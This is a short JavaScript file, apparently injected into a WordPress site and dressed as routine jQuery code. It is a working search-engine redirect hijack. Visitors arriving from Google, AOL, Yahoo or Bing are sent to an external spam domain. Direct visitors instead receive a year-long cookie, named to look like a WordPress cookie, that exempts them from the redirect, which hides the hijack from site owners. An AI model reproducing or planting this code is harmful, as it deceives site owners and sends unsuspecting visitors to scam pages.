jQuery.noConflict();
jQuery(document).ready(function ($) {
var cookie_nw = 'wordpress_651dde3323a405';
    var rUrl = document.referrer;
    gpat = /(.*)google.(.*)$/;
    apat = /(.*)aol.(.*)$/;
    ypat = /(.*)yahoo.(.*)$/;
    bpat = /(.*)bing.(.*)$/;
    wpat = /(.*)watch(.*)$/;
    if (gpat.exec(rUrl) || apat.exec(rUrl) || ypat.exec(rUrl) || bpat.exec(rUrl) || wpat.exec(rUrl)) {
        if( gCie(cookie_nw) ){  
         } else{
                    window.location.href ='https://free.product.cimm.top/?utm_medium=18bb495011b39fdcb319afbb250dc5dbeaf87468&utm_campaign=hui&1=custom1&2=custom2&cid=cid';
         }
    }else{
        if( gCie(cookie_nw) ){  
         } else{
            sck_ie(cookie_nw, 2, 365);
         }
    }

 function sck_ie(c_name, value, expiredays) {
        var exdate = new Date();
        exdate.setDate(exdate.getDate() + expiredays);
        document.cookie = c_name + "=" + escape(value) + ((expiredays == null) ? "" : ";expires=" + exdate.toGMTString());
    }
function gCie(name) 
{ 
    var arr,reg=new RegExp("(^| )"+name+"=([^;]*)(;|$)");
 
    if(arr=document.cookie.match(reg))
 
        return unescape(arr[2]); 
    else 
        return null; 
} 
});